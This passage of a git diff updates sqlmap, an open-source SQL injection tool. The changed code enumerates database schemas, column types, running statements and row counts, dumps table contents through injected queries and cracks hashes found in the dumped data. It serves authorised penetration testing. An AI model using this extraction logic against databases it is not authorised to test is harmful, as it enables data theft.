Backend.isDbms(DBMS.INFORMIX): + query = rootQuery.blind.query2 % (conf.db, conf.db, conf.db, conf.db, conf.db, unsafeSQLIdentificatorNaming(tbl), column) + elif Backend.isDbms(DBMS.MONETDB): + query = rootQuery.blind.query2 % (column, unsafeSQLIdentificatorNaming(tbl), unsafeSQLIdentificatorNaming(conf.db)) colType = unArrayizeValue(inject.getValue(query, union=False, error=False)) + key = int(colType) if hasattr(colType, "isdigit") and colType.isdigit() else colType if Backend.isDbms(DBMS.FIREBIRD): - colType = FIREBIRD_TYPES.get(colType, colType) + colType = FIREBIRD_TYPES.get(key, colType) + elif Backend.isDbms(DBMS.INFORMIX): + notNull = False + if isinstance(key, int) and key > 255: + key -= 256 + notNull = True + colType = INFORMIX_TYPES.get(key, colType) + if notNull: + colType = "%s NOT NULL" % colType column = safeSQLIdentificatorNaming(column) columns[column] = colType @@ -691,61 +925,62 @@ def getColumns(self, onlyColNames=False, colTuple=None, bruteForce=None): if not kb.data.cachedColumns: warnMsg = "unable to retrieve column names for " - warnMsg += ("table '%s' " % tblList[0]) if len(tblList) == 1 else "any table " - warnMsg += "in database '%s'" % unsafeSQLIdentificatorNaming(conf.db) - logger.warn(warnMsg) + warnMsg += ("table '%s' " % unsafeSQLIdentificatorNaming(unArrayizeValue(tblList))) if len(tblList) == 1 else "any table " + if METADB_SUFFIX not in conf.db: + warnMsg += "in database '%s'" % unsafeSQLIdentificatorNaming(conf.db) + logger.warning(warnMsg) if bruteForce is None: return self.getColumns(onlyColNames=onlyColNames, colTuple=colTuple, bruteForce=True) return kb.data.cachedColumns + @stackedmethod def getSchema(self): infoMsg = "enumerating database management system schema" logger.info(infoMsg) - pushValue(conf.db) - pushValue(conf.tbl) - pushValue(conf.col) + try: + pushValue(conf.db) + pushValue(conf.tbl) + pushValue(conf.col) - conf.db = None - conf.tbl = None - conf.col = None - kb.data.cachedTables = {} - kb.data.cachedColumns = {} + kb.data.cachedTables = {} + kb.data.cachedColumns = {} - self.getTables() - - infoMsg = "fetched tables: " - infoMsg += ", ".join(["%s" % ", ".join("%s%s%s" % (unsafeSQLIdentificatorNaming(db), ".." if \ - Backend.isDbms(DBMS.MSSQL) or Backend.isDbms(DBMS.SYBASE) \ - else ".", unsafeSQLIdentificatorNaming(t)) for t in tbl) for db, tbl in \ - kb.data.cachedTables.items()]) - logger.info(infoMsg) + self.getTables() - for db, tables in kb.data.cachedTables.items(): - for tbl in tables: - conf.db = db - conf.tbl = tbl + infoMsg = "fetched tables: " + infoMsg += ", ".join(["%s" % ", ".join("'%s%s%s'" % (unsafeSQLIdentificatorNaming(db), ".." if Backend.isDbms(DBMS.MSSQL) or Backend.isDbms(DBMS.SYBASE) else '.', unsafeSQLIdentificatorNaming(_)) if db else "'%s'" % unsafeSQLIdentificatorNaming(_) for _ in tbl) for db, tbl in kb.data.cachedTables.items()]) + logger.info(infoMsg) - self.getColumns() + for db, tables in kb.data.cachedTables.items(): + for tbl in tables: + conf.db = db + conf.tbl = tbl - conf.col = popValue() - conf.tbl = popValue() - conf.db = popValue() + self.getColumns() + finally: + conf.col = popValue() + conf.tbl = popValue() + conf.db = popValue() return kb.data.cachedColumns def _tableGetCount(self, db, table): - if Backend.getIdentifiedDbms() in (DBMS.ORACLE, DBMS.DB2): + if not db or not table: + return None + + if Backend.getIdentifiedDbms() in UPPER_CASE_DBMSES: db = db.upper() table = table.upper() - if Backend.getIdentifiedDbms() in (DBMS.SQLITE, DBMS.ACCESS, DBMS.FIREBIRD): + if Backend.getIdentifiedDbms() in (DBMS.SQLITE, DBMS.ACCESS, DBMS.FIREBIRD, DBMS.MCKOI, DBMS.EXTREMEDB): query = "SELECT %s FROM %s" % (queries[Backend.getIdentifiedDbms()].count.query % '*', safeSQLIdentificatorNaming(table, True)) else: query = "SELECT %s FROM %s.%s" % (queries[Backend.getIdentifiedDbms()].count.query % '*', safeSQLIdentificatorNaming(db), safeSQLIdentificatorNaming(table, True)) + query = agent.whereQuery(query) count = inject.getValue(query, expected=EXPECTED.INT, charsetType=CHARSET_TYPE.DIGITS) if isNumPosStrValue(count): @@ -762,24 +997,24 @@ def getCount(self): warnMsg = "missing table parameter, sqlmap will retrieve " warnMsg += "the number of entries for all database " warnMsg += "management system databases' tables" - logger.warn(warnMsg) + logger.warning(warnMsg) elif "." in conf.tbl: if not conf.db: - conf.db, conf.tbl = conf.tbl.split(".") + conf.db, conf.tbl = conf.tbl.split('.', 1) - if conf.tbl is not None and conf.db is None and Backend.getIdentifiedDbms() not in (DBMS.SQLITE, DBMS.ACCESS, DBMS.FIREBIRD): + if conf.tbl is not None and conf.db is None and Backend.getIdentifiedDbms() not in (DBMS.SQLITE, DBMS.ACCESS, DBMS.FIREBIRD, DBMS.MCKOI, DBMS.EXTREMEDB): warnMsg = "missing database parameter. sqlmap is going to " warnMsg += "use the current database to retrieve the " warnMsg += "number of entries for table '%s'" % unsafeSQLIdentificatorNaming(conf.tbl) - logger.warn(warnMsg) + logger.warning(warnMsg) conf.db = self.getCurrentDb() self.forceDbmsEnum() if conf.tbl: - for table in conf.tbl.split(","): + for table in conf.tbl.split(','): self._tableGetCount(conf.db, table) else: self.getTables() @@ -789,3 +1024,81 @@ def getCount(self): self._tableGetCount(db, table) return kb.data.cachedCounts + + def getStatements(self): + infoMsg = "fetching SQL statements" + logger.info(infoMsg) + + rootQuery = queries[Backend.getIdentifiedDbms()].statements + + if any(isTechniqueAvailable(_) for _ in (PAYLOAD.TECHNIQUE.UNION, PAYLOAD.TECHNIQUE.ERROR, PAYLOAD.TECHNIQUE.QUERY)) or conf.direct: + if Backend.isDbms(DBMS.MYSQL) and Backend.isFork(FORK.DRIZZLE): + query = rootQuery.inband.query2 + else: + query = rootQuery.inband.query + + while True: + values = inject.getValue(query, blind=False, time=False) + + if not isNoneValue(values): + kb.data.cachedStatements = [] + for value in arrayizeValue(values): + value = (unArrayizeValue(value) or "").strip() + if not isNoneValue(value): + kb.data.cachedStatements.append(value.strip()) + + elif Backend.isDbms(DBMS.PGSQL) and "current_query" not in query: + query = query.replace("query", "current_query") + continue + + break + + if not kb.data.cachedStatements and isInferenceAvailable() and not conf.direct: + infoMsg = "fetching number of statements" + logger.info(infoMsg) + + query = rootQuery.blind.count + + if Backend.isDbms(DBMS.MYSQL) and Backend.isFork(FORK.DRIZZLE): + query = re.sub("INFORMATION_SCHEMA", "DATA_DICTIONARY", query, flags=re.I) + + count = inject.getValue(query, union=False, error=False, expected=EXPECTED.INT, charsetType=CHARSET_TYPE.DIGITS) + + if count == 0: + return kb.data.cachedStatements + elif not isNumPosStrValue(count): + errMsg = "unable to retrieve the number of statements" + raise SqlmapNoneDataException(errMsg) + + plusOne = Backend.getIdentifiedDbms() in PLUS_ONE_DBMSES + indexRange = getLimitRange(count, plusOne=plusOne) + + for index in indexRange: + value = None + + if Backend.getIdentifiedDbms() in (DBMS.MYSQL,): # case with multiple processes + query = rootQuery.blind.query3 % index + identifier = unArrayizeValue(inject.getValue(query, union=False, error=False, expected=EXPECTED.INT)) + + if not isNoneValue(identifier): + query = rootQuery.blind.query2 % identifier + value = unArrayizeValue(inject.getValue(query, union=False, error=False, expected=EXPECTED.INT)) + + if isNoneValue(value): + query = rootQuery.blind.query % index + + if Backend.isDbms(DBMS.MYSQL) and Backend.isFork(FORK.DRIZZLE): + query = re.sub("INFORMATION_SCHEMA", "DATA_DICTIONARY", query, flags=re.I) + + value = unArrayizeValue(inject.getValue(query, union=False, error=False)) + + if not isNoneValue(value): + kb.data.cachedStatements.append(value) + + if not kb.data.cachedStatements: + errMsg = "unable to retrieve the statements" + logger.error(errMsg) + else: + kb.data.cachedStatements = [_.replace(REFLECTED_VALUE_MARKER, "<payload>") for _ in kb.data.cachedStatements] + + return kb.data.cachedStatements diff --git a/plugins/generic/entries.py b/plugins/generic/entries.py index 1db68a1d790..cf1e3cd94e9 100644 --- a/plugins/generic/entries.py +++ b/plugins/generic/entries.py @@ -1,8 +1,8 @@ #!/usr/bin/env python """ -Copyright (c) 2006-2013 sqlmap developers (http://sqlmap.org/) -See the file 'doc/COPYING' for copying permission +Copyright (c) 2006-2026 sqlmap developers (https://sqlmap.org) +See the file 'LICENSE' for copying permission """ import re @@ -12,7 +12,7 @@ from lib.core.common import Backend from lib.core.common import clearConsoleLine from lib.core.common import getLimitRange -from lib.core.common import getUnicode +from lib.core.common import getSafeExString from lib.core.common import isInferenceAvailable from lib.core.common import isListLike from lib.core.common import isNoneValue @@ -21,8 +21,12 @@ from lib.core.common import prioritySortColumns from lib.core.common import readInput from lib.core.common import safeSQLIdentificatorNaming +from lib.core.common import singleTimeLogMessage +from lib.core.common import singleTimeWarnMessage from lib.core.common import unArrayizeValue from lib.core.common import unsafeSQLIdentificatorNaming +from lib.core.convert import getConsoleLength +from lib.core.convert import getUnicode from lib.core.data import conf from lib.core.data import kb from lib.core.data import logger @@ -38,12 +42,17 @@ from lib.core.exception import SqlmapUnsupportedFeatureException from lib.core.settings import CHECK_ZERO_COLUMNS_THRESHOLD from lib.core.settings import CURRENT_DB +from lib.core.settings import METADB_SUFFIX from lib.core.settings import NULL +from lib.core.settings import PLUS_ONE_DBMSES +from lib.core.settings import UPPER_CASE_DBMSES from lib.request import inject from lib.utils.hash import attackDumpedTable from lib.utils.pivotdumptable import pivotDumpTable +from thirdparty import six +from thirdparty.six.moves import zip as _zip -class Entries: +class Entries(object): """ This class defines entries' enumeration functionalities for plugins. """ @@ -59,83 +68,116 @@ def dumpTable(self, foundData=None): warnMsg = "missing database parameter. sqlmap is going " warnMsg += "to use the current database to enumerate " warnMsg += "table(s) entries" - logger.warn(warnMsg) + logger.warning(warnMsg) conf.db = self.getCurrentDb() elif conf.db is not None: - if Backend.isDbms(DBMS.ORACLE): + if Backend.getIdentifiedDbms() in UPPER_CASE_DBMSES: conf.db = conf.db.upper() - if ',' in conf.db: + if ',' in conf.db: errMsg = "only one database name is allowed when enumerating " errMsg += "the tables' columns" raise SqlmapMissingMandatoryOptionException(errMsg) - conf.db = safeSQLIdentificatorNaming(conf.db) + if conf.exclude and re.search(conf.exclude, conf.db, re.I) is not None: + infoMsg = "skipping database '%s'" % unsafeSQLIdentificatorNaming(conf.db) + singleTimeLogMessage(infoMsg) + return + + conf.db = safeSQLIdentificatorNaming(conf.db) or "" if conf.tbl: - if Backend.getIdentifiedDbms() in (DBMS.ORACLE, DBMS.DB2): + if Backend.getIdentifiedDbms() in UPPER_CASE_DBMSES: conf.tbl = conf.tbl.upper() - tblList = conf.tbl.split(",") + tblList = conf.tbl.split(',') else: self.getTables() if len(kb.data.cachedTables) > 0: - tblList = kb.data.cachedTables.values() + tblList = list(six.itervalues(kb.data.cachedTables)) - if isinstance(tblList[0], (set, tuple, list)): + if tblList and isListLike(tblList[0]): tblList = tblList[0] - else: + elif conf.db and not conf.search: errMsg = "unable to retrieve the tables " errMsg += "in database '%s'" % unsafeSQLIdentificatorNaming(conf.db) raise SqlmapNoneDataException(errMsg) + else: + return for tbl in tblList: tblList[tblList.index(tbl)] = safeSQLIdentificatorNaming(tbl, True) for tbl in tblList: + if kb.dumpKeyboardInterrupt: + break + + if conf.exclude and re.search(conf.exclude, unsafeSQLIdentificatorNaming(tbl), re.I) is not None: + infoMsg = "skipping table '%s'" % unsafeSQLIdentificatorNaming(tbl) + singleTimeLogMessage(infoMsg) + continue + conf.tbl = tbl kb.data.dumpedTable = {} if foundData is None: kb.data.cachedColumns = {} - self.getColumns(onlyColNames=True) + self.getColumns(onlyColNames=True, dumpMode=True) else: kb.data.cachedColumns = foundData try: - kb.dumpTable = "%s.%s" % (conf.db, tbl) - - if not safeSQLIdentificatorNaming(conf.db) in kb.data.cachedColumns \ - or safeSQLIdentificatorNaming(tbl, True) not in \ - kb.data.cachedColumns[safeSQLIdentificatorNaming(conf.db)] \ - or not kb.data.cachedColumns[safeSQLIdentificatorNaming(conf.db)][safeSQLIdentificatorNaming(tbl, True)]: - warnMsg = "unable to enumerate the columns for table " - warnMsg += "'%s' in database" % unsafeSQLIdentificatorNaming(tbl) - warnMsg += " '%s'" % unsafeSQLIdentificatorNaming(conf.db) + if Backend.isDbms(DBMS.INFORMIX): + kb.dumpTable = "%s:%s" % (conf.db, tbl) + elif Backend.isDbms(DBMS.SQLITE): + kb.dumpTable = tbl + elif METADB_SUFFIX.upper() in conf.db.upper(): + kb.dumpTable = tbl + else: + kb.dumpTable = "%s.%s" % (conf.db, tbl) + + if safeSQLIdentificatorNaming(conf.db) not in kb.data.cachedColumns or safeSQLIdentificatorNaming(tbl, True) not in kb.data.cachedColumns[safeSQLIdentificatorNaming(conf.db)] or not kb.data.cachedColumns[safeSQLIdentificatorNaming(conf.db)][safeSQLIdentificatorNaming(tbl, True)]: + warnMsg = "unable to enumerate the columns for table '%s'" % unsafeSQLIdentificatorNaming(tbl) + if METADB_SUFFIX.upper() not in conf.db.upper(): + warnMsg += " in database '%s'" % unsafeSQLIdentificatorNaming(conf.db) warnMsg += ", skipping" if len(tblList) > 1 else "" - logger.warn(warnMsg) + logger.warning(warnMsg) continue columns = kb.data.cachedColumns[safeSQLIdentificatorNaming(conf.db)][safeSQLIdentificatorNaming(tbl, True)] - colList = sorted(filter(None, columns.keys())) - colNames = colString = ", ".join(column for column in colList) + colList = sorted(column for column in columns if column) + + if conf.exclude: + colList = [_ for _ in colList if re.search(conf.exclude, _, re.I) is None] + + if not colList: + warnMsg = "skipping table '%s'" % unsafeSQLIdentificatorNaming(tbl) + if METADB_SUFFIX.upper() not in conf.db.upper(): + warnMsg += " in database '%s'" % unsafeSQLIdentificatorNaming(conf.db) + warnMsg += " (no usable column names)" + logger.warning(warnMsg) + continue + + kb.dumpColumns = [unsafeSQLIdentificatorNaming(_) for _ in colList] + colNames = colString = ','.join(column for column in colList) rootQuery = queries[Backend.getIdentifiedDbms()].dump_table infoMsg = "fetching entries" if conf.col: infoMsg += " of column(s) '%s'" % colNames infoMsg += " for table '%s'" % unsafeSQLIdentificatorNaming(tbl) - infoMsg += " in database '%s'" % unsafeSQLIdentificatorNaming(conf.db) + if METADB_SUFFIX.upper() not in conf.db.upper(): + infoMsg += " in database '%s'" % unsafeSQLIdentificatorNaming(conf.db) logger.info(infoMsg) for column in colList: _ = agent.preprocessField(tbl, column) if _ != column: - colString = re.sub(r"\b%s\b" % column, _, colString) + colString = re.sub(r"\b%s\b" % re.escape(column), _.replace("\\", r"\\"), colString) entriesCount = 0 @@ -143,32 +185,81 @@ def dumpTable(self, foundData=None): entries = [] query = None - if Backend.getIdentifiedDbms() in (DBMS.ORACLE, DBMS.DB2): + if Backend.getIdentifiedDbms() in (DBMS.ORACLE, DBMS.DB2, DBMS.DERBY, DBMS.ALTIBASE, DBMS.MIMERSQL, DBMS.SNOWFLAKE): query = rootQuery.inband.query % (colString, tbl.upper() if not conf.db else ("%s.%s" % (conf.db.upper(), tbl.upper()))) - elif Backend.getIdentifiedDbms() in (DBMS.SQLITE, DBMS.ACCESS, DBMS.FIREBIRD, DBMS.MAXDB): + elif Backend.getIdentifiedDbms() in (DBMS.SQLITE, DBMS.ACCESS, DBMS.FIREBIRD, DBMS.MAXDB, DBMS.MCKOI, DBMS.EXTREMEDB, DBMS.RAIMA, DBMS.SNOWFLAKE): query = rootQuery.inband.query % (colString, tbl) elif Backend.getIdentifiedDbms() in (DBMS.SYBASE, DBMS.MSSQL): # Partial inband and error if not (isTechniqueAvailable(PAYLOAD.TECHNIQUE.UNION) and kb.injection.data[PAYLOAD.TECHNIQUE.UNION].where == PAYLOAD.WHERE.ORIGINAL): - table = "%s.%s" % (conf.db, tbl) - - retVal = pivotDumpTable(table, colList, blind=False) - - if retVal: - entries, _ = retVal - entries = zip(*[entries[colName] for colName in colList]) + table = "%s.%s" % (conf.db, tbl) if conf.db else tbl + + if Backend.isDbms(DBMS.MSSQL) and not conf.forcePivoting: + warnMsg = "in case of table dumping problems (e.g. column entry order) " + warnMsg += "you are advised to rerun with '--force-pivoting'" + singleTimeWarnMessage(warnMsg) + + query = rootQuery.blind.count % table + query = agent.whereQuery(query) + + count = inject.getValue(query, blind=False, time=False, expected=EXPECTED.INT, charsetType=CHARSET_TYPE.DIGITS) + if isNumPosStrValue(count): + try: + indexRange = getLimitRange(count, plusOne=True) + + for index in indexRange: + row = [] + for column in colList: + query = rootQuery.blind.query3 % (column, column, table, index) + query = agent.whereQuery(query) + value = inject.getValue(query, blind=False, time=False, dump=True) or "" + row.append(value) + + if not entries and isNoneValue(row): + break + + entries.append(row) + + except KeyboardInterrupt: + kb.dumpKeyboardInterrupt = True + clearConsoleLine() + warnMsg = "Ctrl+C detected in dumping phase" + logger.warning(warnMsg) + + if isNoneValue(entries) and not kb.dumpKeyboardInterrupt: + try: + retVal = pivotDumpTable(table, colList, blind=False) + except KeyboardInterrupt: + retVal = None + kb.dumpKeyboardInterrupt = True + clearConsoleLine() + warnMsg = "Ctrl+C detected in dumping phase" + logger.warning(warnMsg) + + if retVal: + entries, _ = retVal + entries = BigArray(_zip(*[entries[colName] for colName in colList])) else: query = rootQuery.inband.query % (colString, conf.db, tbl) - elif Backend.getIdentifiedDbms() in (DBMS.MYSQL, DBMS.PGSQL): + elif Backend.getIdentifiedDbms() in (DBMS.MYSQL, DBMS.PGSQL, DBMS.HSQLDB, DBMS.H2, DBMS.VERTICA, DBMS.PRESTO, DBMS.CRATEDB, DBMS.CACHE, DBMS.VIRTUOSO, DBMS.CLICKHOUSE): query = rootQuery.inband.query % (colString, conf.db, tbl, prioritySortColumns(colList)[0]) else: query = rootQuery.inband.query % (colString, conf.db, tbl) - if not entries and query: - entries = inject.getValue(query, blind=False, time=False, dump=True) + query = agent.whereQuery(query) + + if not entries and query and not kb.dumpKeyboardInterrupt: + try: + entries = inject.getValue(query, blind=False, time=False, dump=True) + except KeyboardInterrupt: + entries = None + kb.dumpKeyboardInterrupt = True + clearConsoleLine() + warnMsg = "Ctrl+C detected in dumping phase" + logger.warning(warnMsg) if not isNoneValue(entries): - if isinstance(entries, basestring): + if isinstance(entries, six.string_types): entries = [entries] elif not isListLike(entries): entries = [] @@ -183,13 +274,12 @@ def dumpTable(self, foundData=None): if entry is None or len(entry) == 0: continue - if isinstance(entry, basestring): + if isinstance(entry, six.string_types): colEntry = entry else: colEntry = unArrayizeValue(entry[index]) if index < len(entry) else u'' - _ = len(DUMP_REPLACEMENTS.get(getUnicode(colEntry), getUnicode(colEntry))) - maxLen = max(len(column), _) + maxLen = max(getConsoleLength(column), getConsoleLength(DUMP_REPLACEMENTS.get(getUnicode(colEntry), getUnicode(colEntry)))) if maxLen > kb.data.dumpedTable[column]["length"]: kb.data.dumpedTable[column]["length"] = maxLen @@ -204,17 +294,19 @@ def dumpTable(self, foundData=None): infoMsg += "in database '%s'" % unsafeSQLIdentificatorNaming(conf.db) logger.info(infoMsg) - if Backend.getIdentifiedDbms() in (DBMS.ORACLE, DBMS.DB2): + if Backend.getIdentifiedDbms() in (DBMS.ORACLE, DBMS.DB2, DBMS.DERBY, DBMS.ALTIBASE, DBMS.MIMERSQL, DBMS.SNOWFLAKE): query = rootQuery.blind.count % (tbl.upper() if not conf.db else ("%s.%s" % (conf.db.upper(), tbl.upper()))) - elif Backend.getIdentifiedDbms() in (DBMS.SQLITE, DBMS.ACCESS, DBMS.FIREBIRD): + elif Backend.getIdentifiedDbms() in (DBMS.SQLITE, DBMS.MAXDB, DBMS.ACCESS, DBMS.FIREBIRD, DBMS.MCKOI, DBMS.EXTREMEDB, DBMS.RAIMA): query = rootQuery.blind.count % tbl elif Backend.getIdentifiedDbms() in (DBMS.SYBASE, DBMS.MSSQL): - query = rootQuery.blind.count % ("%s.%s" % (conf.db, tbl)) - elif Backend.isDbms(DBMS.MAXDB): - query = rootQuery.blind.count % tbl + query = rootQuery.blind.count % ("%s.%s" % (conf.db, tbl)) if conf.db else tbl + elif Backend.isDbms(DBMS.INFORMIX): + query = rootQuery.blind.count % (conf.db, tbl) else: query = rootQuery.blind.count % (conf.db, tbl) + query = agent.whereQuery(query) + count = inject.getValue(query, union=False, error=False, expected=EXPECTED.INT, charsetType=CHARSET_TYPE.DIGITS) lengths = {} @@ -224,7 +316,7 @@ def dumpTable(self, foundData=None): warnMsg = "table '%s' " % unsafeSQLIdentificatorNaming(tbl) warnMsg += "in database '%s' " % unsafeSQLIdentificatorNaming(conf.db) warnMsg += "appears to be empty" - logger.warn(warnMsg) + logger.warning(warnMsg) for column in colList: lengths[column] = len(column) @@ -236,31 +328,72 @@ def dumpTable(self, foundData=None): warnMsg += "column(s) '%s' " % colNames warnMsg += "entries for table '%s' " % unsafeSQLIdentificatorNaming(tbl) warnMsg += "in database '%s'" % unsafeSQLIdentificatorNaming(conf.db) - logger.warn(warnMsg) + logger.warning(warnMsg) continue - elif Backend.getIdentifiedDbms() in (DBMS.ACCESS, DBMS.SYBASE, DBMS.MAXDB, DBMS.MSSQL): - if Backend.isDbms(DBMS.ACCESS): + elif Backend.getIdentifiedDbms() in (DBMS.ACCESS, DBMS.SYBASE, DBMS.MAXDB, DBMS.MSSQL, DBMS.INFORMIX, DBMS.MCKOI, DBMS.RAIMA): + if Backend.getIdentifiedDbms() in (DBMS.ACCESS, DBMS.MCKOI, DBMS.RAIMA): table = tbl - elif Backend.getIdentifiedDbms() in (DBMS.SYBASE, DBMS.MSSQL): - table = "%s.%s" % (conf.db, tbl) - elif Backend.isDbms(DBMS.MAXDB): - table = "%s.%s" % (conf.db, tbl) + elif Backend.getIdentifiedDbms() in (DBMS.SYBASE, DBMS.MSSQL, DBMS.MAXDB): + table = "%s.%s" % (conf.db, tbl) if conf.db else tbl + elif Backend.isDbms(DBMS.INFORMIX): + table = "%s:%s" % (conf.db, tbl) if conf.db else tbl + + if Backend.isDbms(DBMS.MSSQL) and not conf.forcePivoting: + warnMsg = "in case of table dumping problems (e.g. column entry order) " + warnMsg += "you are advised to rerun with '--force-pivoting'" + singleTimeWarnMessage(warnMsg) + + try: + indexRange = getLimitRange(count, plusOne=True) + + for index in indexRange: + for column in colList: + query = rootQuery.blind.query3 % (column, column, table, index) + query = agent.whereQuery(query) + + value = inject.getValue(query, union=False, error=False, dump=True) or "" + + if column not in lengths: + lengths[column] = 0 + + if column not in entries: + entries[column] = BigArray() + + lengths[column] = max(lengths[column], len(DUMP_REPLACEMENTS.get(getUnicode(value), getUnicode(value)))) + entries[column].append(value) + + except KeyboardInterrupt: + kb.dumpKeyboardInterrupt = True + clearConsoleLine() + warnMsg = "Ctrl+C detected in dumping phase" + logger.warning(warnMsg) + + if not entries and not kb.dumpKeyboardInterrupt: + try: + retVal = pivotDumpTable(table, colList, count, blind=True) + except KeyboardInterrupt: + retVal = None + kb.dumpKeyboardInterrupt = True + clearConsoleLine() + warnMsg = "Ctrl+C detected in dumping phase" + logger.warning(warnMsg) - retVal = pivotDumpTable(table, colList, count, blind=True) - - if retVal: - entries, lengths = retVal + if retVal: + entries, lengths = retVal else: emptyColumns = [] - plusOne = Backend.getIdentifiedDbms() in (DBMS.ORACLE, DBMS.DB2) - indexRange = getLimitRange(count, dump=True, plusOne=plusOne) + plusOne = Backend.getIdentifiedDbms() in PLUS_ONE_DBMSES + indexRange = getLimitRange(count, plusOne=plusOne) if len(colList) < len(indexRange) > CHECK_ZERO_COLUMNS_THRESHOLD: + debugMsg = "checking for empty columns" + logger.debug(infoMsg) + for column in colList: - if inject.getValue("SELECT COUNT(%s) FROM %s" % (column, kb.dumpTable), union=False, error=False) == '0': + if not inject.checkBooleanExpression("(SELECT COUNT(%s) FROM %s)>0" % (column, kb.dumpTable)): emptyColumns.append(column) debugMsg = "column '%s' of table '%s' will not be " % (column, kb.dumpTable) debugMsg += "dumped as it appears to be empty" @@ -277,29 +410,36 @@ def dumpTable(self, foundData=None): if column not in entries: entries[column] = BigArray() - if Backend.getIdentifiedDbms() in (DBMS.MYSQL, DBMS.PGSQL): + if Backend.getIdentifiedDbms() in (DBMS.MYSQL, DBMS.PGSQL, DBMS.HSQLDB, DBMS.H2, DBMS.VERTICA, DBMS.PRESTO, DBMS.CRATEDB, DBMS.CACHE, DBMS.CLICKHOUSE, DBMS.SNOWFLAKE): query = rootQuery.blind.query % (agent.preprocessField(tbl, column), conf.db, conf.tbl, sorted(colList, key=len)[0], index) - elif Backend.getIdentifiedDbms() in (DBMS.ORACLE, DBMS.DB2): - query = rootQuery.blind.query % (agent.preprocessField(tbl, column), - tbl.upper() if not conf.db else ("%s.%s" % (conf.db.upper(), tbl.upper())), - index) - elif Backend.isDbms(DBMS.SQLITE): + elif Backend.getIdentifiedDbms() in (DBMS.ORACLE, DBMS.DB2, DBMS.DERBY, DBMS.ALTIBASE,): + query = rootQuery.blind.query % (agent.preprocessField(tbl, column), tbl.upper() if not conf.db else ("%s.%s" % (conf.db.upper(), tbl.upper())), index) + elif Backend.getIdentifiedDbms() in (DBMS.MIMERSQL,): + query = rootQuery.blind.query % (agent.preprocessField(tbl, column), tbl.upper() if not conf.db else ("%s.%s" % (conf.db.upper(), tbl.upper())), sorted(colList, key=len)[0], index) + elif Backend.getIdentifiedDbms() in (DBMS.SQLITE, DBMS.EXTREMEDB): query = rootQuery.blind.query % (agent.preprocessField(tbl, column), tbl, index) - elif Backend.isDbms(DBMS.FIREBIRD): query = rootQuery.blind.query % (index, agent.preprocessField(tbl, column), tbl) + elif Backend.getIdentifiedDbms() in (DBMS.INFORMIX, DBMS.VIRTUOSO): + query = rootQuery.blind.query % (index, agent.preprocessField(tbl, column), conf.db, tbl, sorted(colList, key=len)[0]) + elif Backend.isDbms(DBMS.FRONTBASE): + query = rootQuery.blind.query % (index, agent.preprocessField(tbl, column), conf.db, tbl) + else: + query = rootQuery.blind.query % (agent.preprocessField(tbl, column), conf.db, tbl, index) + + query = agent.whereQuery(query) value = NULL if column in emptyColumns else inject.getValue(query, union=False, error=False, dump=True) value = '' if value is None else value - _ = DUMP_REPLACEMENTS.get(getUnicode(value), getUnicode(value)) - lengths[column] = max(lengths[column], len(_)) + lengths[column] = max(lengths[column], len(DUMP_REPLACEMENTS.get(getUnicode(value), getUnicode(value)))) entries[column].append(value) except KeyboardInterrupt: + kb.dumpKeyboardInterrupt = True clearConsoleLine() warnMsg = "Ctrl+C detected in dumping phase" - logger.warn(warnMsg) + logger.warning(warnMsg) for column, columnEntries in entries.items(): length = max(lengths[column], len(column)) @@ -314,20 +454,29 @@ def dumpTable(self, foundData=None): warnMsg += "of columns '%s' " % colNames warnMsg += "for table '%s' " % unsafeSQLIdentificatorNaming(tbl) warnMsg += "in database '%s'%s" % (unsafeSQLIdentificatorNaming(conf.db), " (permission denied)" if kb.permissionFlag else "") - logger.warn(warnMsg) + logger.warning(warnMsg) else: kb.data.dumpedTable["__infos__"] = {"count": entriesCount, "table": safeSQLIdentificatorNaming(tbl, True), "db": safeSQLIdentificatorNaming(conf.db)} - attackDumpedTable() + + if not conf.disableHashing: + try: + attackDumpedTable() + except (IOError, OSError) as ex: + errMsg = "an error occurred while attacking " + errMsg += "table dump ('%s')" % getSafeExString(ex) + logger.critical(errMsg) + conf.dumper.dbTableValues(kb.data.dumpedTable) - except SqlmapConnectionException, e: - errMsg = "connection exception detected in dumping phase: " - errMsg += "'%s'" % e + except SqlmapConnectionException as ex: + errMsg = "connection exception detected in dumping phase " + errMsg += "('%s')" % getSafeExString(ex) logger.critical(errMsg) finally: + kb.dumpColumns = None kb.dumpTable = None def dumpAll(self): @@ -350,12 +499,17 @@ def dumpAll(self): if kb.data.cachedTables: if isinstance(kb.data.cachedTables, list): - kb.data.cachedTables = { None: kb.data.cachedTables } + kb.data.cachedTables = {None: kb.data.cachedTables} for db, tables in kb.data.cachedTables.items(): conf.db = db for table in tables: + if conf.exclude and re.search(conf.exclude, table, re.I) is not None: + infoMsg = "skipping table '%s'" % unsafeSQLIdentificatorNaming(table) + logger.info(infoMsg) + continue + try: conf.tbl = table kb.data.cachedColumns = {} @@ -363,14 +517,13 @@ def dumpAll(self): self.dumpTable() except SqlmapNoneDataException: - infoMsg = "skipping table '%s'" % table + infoMsg = "skipping table '%s'" % unsafeSQLIdentificatorNaming(table) logger.info(infoMsg) def dumpFoundColumn(self, dbs, foundCols, colConsider): - message = "do you want to dump entries? [Y/n] " - output = readInput(message, default="Y") + message = "do you want to dump found column(s) entries? [Y/n] " - if output and output[0] not in ("y", "Y"): + if not readInput(message, default='Y', boolean=True): return dumpFromDbs = [] @@ -378,17 +531,17 @@ def dumpFoundColumn(self, dbs, foundCols, colConsider): for db, tblData in dbs.items(): if tblData: - message += "[%s]\n" % db + message += "[%s]\n" % unsafeSQLIdentificatorNaming(db) message += "[q]uit" - test = readInput(message, default="a") + choice = readInput(message, default='a') - if not test or test in ("a", "A"): - dumpFromDbs = dbs.keys() - elif test in ("q", "Q"): + if not choice or choice in ('a', 'A'): + dumpFromDbs = list(dbs.keys()) + elif choice in ('q', 'Q'): return else: - dumpFromDbs = test.replace(" ", "").split(",") + dumpFromDbs = choice.replace(" ", "").split(',') for db, tblData in dbs.items(): if db not in dumpFromDbs or not tblData: @@ -396,7 +549,7 @@ def dumpFoundColumn(self, dbs, foundCols, colConsider): conf.db = db dumpFromTbls = [] - message = "which table(s) of database '%s'?\n" % db + message = "which table(s) of database '%s'?\n" % unsafeSQLIdentificatorNaming(db) message += "[a]ll (default)\n" for tbl in tblData: @@ -404,23 +557,28 @@ def dumpFoundColumn(self, dbs, foundCols, colConsider): message += "[s]kip\n" message += "[q]uit" - test = readInput(message, default="a") + choice = readInput(message, default='a') - if not test or test in ("a", "A"): + if not choice or choice in ('a', 'A'): dumpFromTbls = tblData - elif test in ("s", "S"): + elif choice in ('s', 'S'): continue - elif test in ("q", "Q"): + elif choice in ('q', 'Q'): return else: - 